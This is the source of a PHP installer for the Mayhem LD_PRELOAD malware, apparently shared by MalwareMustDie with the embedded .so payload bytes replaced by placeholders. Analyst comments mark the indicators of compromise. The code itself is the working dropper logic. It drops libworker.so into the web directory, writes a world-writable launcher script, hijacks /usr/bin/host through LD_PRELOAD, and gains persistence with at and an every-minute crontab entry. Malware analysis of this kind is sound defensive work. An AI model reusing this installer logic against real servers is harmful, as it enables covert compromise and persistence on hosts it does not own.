- // Sample defanged ("jinxed") source code of the .so ELF LD_PRELOAD PHP malware installer (Mayhem dropper); the embedded payload bytes are replaced with placeholders
- // MalwareMustDie
- <?php
- // Installer stage of the LD_PRELOAD dropper. Output is plain text so the status lines
- // printed further down ("Arch is", "SO dumped", "AT success", ...) are readable by the caller.
- header("Content-type: text/plain");
- // Fixed marker printed before anything else; presumably an acknowledgement token for whoever
- // triggers the script — its meaning is not verifiable from this file.
- print "2842123700\n";
- // Polyfill so the dropper also runs on very old PHP builds that lack file_put_contents().
- // Returns the byte count written by fwrite(), or false when the file cannot be opened.
- // The '@' suppresses the fopen() warning, so a failed write (e.g. unwritable webroot) is silent
- // apart from the "SO dumped " line below printing an empty value.
- if (! function_exists('file_put_contents')) {
- function file_put_contents($filename, $data) {
- $f = @fopen($filename, 'w');
- if (! $f)
- return false;
- $bytes = fwrite($f, $data);
- fclose($f);
- return $bytes;
- }
- }
- // Stage 1: kill any already-running hijacked "host" process (basename("/usr/bin/host") == "host")
- // so the shared object written below is not held open by an earlier instance. Errors are hidden by '@'.
- @system("killall -9 ".basename("/usr/bin/host"));
- // Payload shared objects. In the live sample these strings carry the raw 32-bit and 64-bit
- // ELF .so bytes; this copy is defanged and holds placeholders only.
- $so32 = "xxxxxxxxxx";
- $so64 = "xxxxxxxxxx";
- // Word-size probe: on 32-bit PHP intval() saturates 2^63-1 to PHP_INT_MAX (2147483647).
- $arch = 64;
- if (intval("9223372036854775807") == 2147483647)
- $arch = 32;
- print "Arch is ".$arch."\n";
- $so = $arch == 32 ? $so32 : $so64;
- // Read the first 8 bytes of the system's /usr/bin/host ELF header. unpack("C*") is 1-indexed,
- // so $n[8] is e_ident[7] (EI_OSABI). It is copied into the same offset of the payload so the
- // dropped library advertises the same OS ABI as the host binary (9 == ELFOSABI_FREEBSD).
- // If /usr/bin/host is absent the payload is written unpatched.
- $f = fopen("/usr/bin/host", "rb");
- if ($f) {
- $n = unpack("C*", fread($f, 8));
- $so[7] = sprintf("%c", $n[8]);
- print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
- fclose($f);
- }
- // Drop the library into the current working directory (the directory the PHP script runs from).
- // IOC: ./libworker.so next to web content.
- print "SO dumped ".file_put_contents("./libworker.so", $so)."\n";
- // Debug switch: with MAYHEM_DEBUG set the script stops after writing the .so and installs no persistence.
- if (getenv("MAYHEM_DEBUG"))
- exit(0);
- // Virtual host + request URI of this request; exported to the payload as the AU environment
- // variable by the launcher script below. What the library does with it is not visible here.
- // Forensics: the value is embedded verbatim in 1.sh and in the environment of the launched process.
- $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
- /* second stage dropper */
- // Launcher script 1.sh: cd to the drop directory; if the .so is present, kill "host", export AU
- // and LD_PRELOAD=./libworker.so, run the legitimate /usr/bin/host so the library's code executes
- // inside a benign-looking process name, unset LD_PRELOAD, strip the job's own lines from the
- // crontab (every line containing "1.sh" or "crontab" — unrelated entries matching those strings
- // are removed too), then delete 1.sh, which the PHP side uses as its success marker.
- $HBN=basename("/usr/bin/host");
- $SCP=getcwd();
- $SCR ="#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\n";
- $SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n";
- // IOC: world-writable/executable 1.sh in the web directory (mode 0777).
- @file_put_contents("1.sh", $SCR);
- @chmod("1.sh", 0777);
- /* try at now, file will be removed, crontab cleaned on success */
- // Execution attempt 1: at(1). "Success" is inferred only from 1.sh disappearing within 5 s
- // (the launcher removes itself); a run that fails before the rm falls through to the next method.
- @system("at now -f 1.sh", $ret);
- if ($ret == 0) {
- for ($i = 0; $i < 5; $i++) {
- if (! @file_exists("1.sh")) {
- print "AT success\n";
- exit(0);
- }
- sleep(1);
- }
- }
- // Execution attempt 2: every-minute crontab entry with the absolute path of 1.sh, then wait just
- // over a minute for it to fire and self-delete. The "grep -v crontab" again drops any existing
- // entry containing that word. IOC: "* * * * * <drop dir>/1.sh" in the web user's crontab.
- @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
- if ($ret == 0) {
- for ($i = 0; $i < 62; $i++) {
- if (! @file_exists("1.sh")) {
- print "CRONTAB success\n";
- exit(0);
- }
- sleep(1);
- }
- }
- // Execution attempt 3: run the launcher synchronously as the web server's own user
- // (the hijacked "host" process then appears as a child of the PHP/web server process).
- print "Running straight\n";
- @system("./1.sh");
- ?>